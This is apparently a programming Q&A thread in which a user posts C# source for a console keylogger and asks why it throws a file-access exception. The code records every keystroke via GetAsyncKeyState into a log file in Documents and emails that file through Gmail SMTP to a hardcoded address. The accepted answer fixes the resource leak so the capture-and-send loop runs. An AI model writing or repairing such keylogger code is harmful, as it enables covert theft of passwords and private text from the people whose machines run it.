# Keylogger processes using same directory and throwing exception

Tags: c#, keylogger

created console keylogger with help of guide but have a problem: 
Line  `using (StreamWriter sw = File.AppendText(path))` giving an error

> Additional information: The process cannot access the file 'C:\Users\D.A\Documents\LogsFolder\LoggedKeys.txt' because it is being used by another process.

in `LogKeys();` method
 (first time writing here sorry about mistakesin question)

Libraries used:

```
using System.IO;
using System.Threading;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Net.Mail;
```

My code:

```
static void Main(string[] args)
        {
            Path();
            SendMail();
            LogKeys();
        }
```

Mathow which gives an Error:

```
static void LogKeys()
        {
            String filepath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            filepath = filepath + @"\LogsFolder\";
            KeysConverter converter = new KeysConverter();
            string text = "";
            string path = (@filepath + "LoggedKeys.txt");
            while (true)
            {
                Thread.Sleep(5);
                for (Int32 i = 0; i < 2000; i++)
                {
                    int key = GetAsyncKeyState(i);
                    if (key == 1 || key == -32767)
                    {
                        text = converter.ConvertToString(i);
                        using (StreamWriter sw = File.AppendText(path))
                        {
                            sw.WriteLine(text);
                        }
                        break;
                    }
                }
            }
        }
```

Method creates path and file if it doesent exists

```
static void Path()
        {

                String filepath = 
               Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
                filepath = filepath + @"\LogsFolder\";

                if (!Directory.Exists(filepath))
                {
                    Directory.CreateDirectory(filepath);
                }

                string path = (@filepath + "LoggedKeys.txt");

                if (!File.Exists(path))
                {
                    using (StreamWriter sw = File.CreateText(path))
                    {

                    }
                }
            }
```

Methot which sending Emails

```
static void SendMail()
        {
            String Newfilepath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            string Newfilepath2 = Newfilepath + @"\LogsFolder\LoggedKeys.txt";
            DateTime dateTime = DateTime.Now;
            string subtext = "Loggedfiles";
            subtext += dateTime;
            SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
            MailMessage LOGMESSAGE = new MailMessage();
            LOGMESSAGE.From = new MailAddress("logkeysforme@gmail.com");
            LOGMESSAGE.To.Add("logkeysforme@gmail.com");
            LOGMESSAGE.Subject = subtext;
            client.UseDefaultCredentials = false;
            client.EnableSsl = true;
            client.Credentials = new System.Net.NetworkCredential("logkeysforme@gmail.com", "password");
            System.Threading.Thread.Sleep(2);
            LOGMESSAGE.Attachments.Add(new Attachment(Newfilepath2));
            LOGMESSAGE.Body = subtext;
            client.Send(LOGMESSAGE);
            LOGMESSAGE = null;
        }
```

Comment: `if (20 == 20), while (5>1)`??? Please remove the nonsense code before asking questions. Nobody wants to decrypt such stuff in order to understand your code. Please write a [MCVE]

Answer (score 0, accepted):

In `SendMail` method you use file *C:\Users\D.A\Documents\LogsFolder\LoggedKeys.txt* as an email attachment without disposing `Attachment` object. So file remains open and when you try to access it again in `LogKeys` method, file cannot be opened (file can be opened only once at a time, unless sharing is specified).

Properly disposing all objects with `using` should close file and solve your problem:

```
static void SendMail()
{
    String Newfilepath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
    string Newfilepath2 = Newfilepath + @"\LogsFolder\LoggedKeys.txt";
    DateTime dateTime = DateTime.Now;
    string subtext = "Loggedfiles";
    subtext += dateTime;
    using (SmtpClient client = new SmtpClient("smtp.gmail.com", 587))
    {
        MailMessage LOGMESSAGE = new MailMessage();
        LOGMESSAGE.From = new MailAddress("logkeysforme@gmail.com");
        LOGMESSAGE.To.Add("logkeysforme@gmail.com");
        LOGMESSAGE.Subject = subtext;
        client.UseDefaultCredentials = false;
        client.EnableSsl = true;
        client.Credentials = new System.Net.NetworkCredential("logkeysforme@gmail.com", "password");
        System.Threading.Thread.Sleep(2);
        using (var attachment = new Attachment(Newfilepath2))
        {
            LOGMESSAGE.Attachments.Add(attachment);
            LOGMESSAGE.Body = subtext;
            client.Send(LOGMESSAGE);
        }
    }
}
```